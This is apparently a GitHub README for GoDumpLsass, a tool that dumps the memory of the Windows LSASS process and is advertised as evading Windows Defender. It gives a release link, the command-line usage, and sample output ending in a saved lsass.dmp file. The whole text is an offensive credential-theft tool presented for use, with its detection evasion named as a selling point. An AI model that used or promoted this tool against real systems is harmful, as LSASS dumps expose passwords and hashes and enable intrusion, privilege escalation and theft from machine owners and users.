GoDumpLsass
GoDumpLsass is a simple tool that can dump lsass without to get caught by Windows Defender.
Releases
https://github.com/Enelg52/GoDumpLsass/releases
Usage
.\GoDumpLsass.exe -p [path]
Example
.\GoDumpLsass.exe -p "C:\Users\enelg\Downloads\"
[-] Get lsass process id
[+] Lsass pid : 908
[-] Dump process
[+] Process dumped
[+] The dump is under C:\Users\enelg\Downloads\lsass.dmp
Contributing
Pull requests are welcome !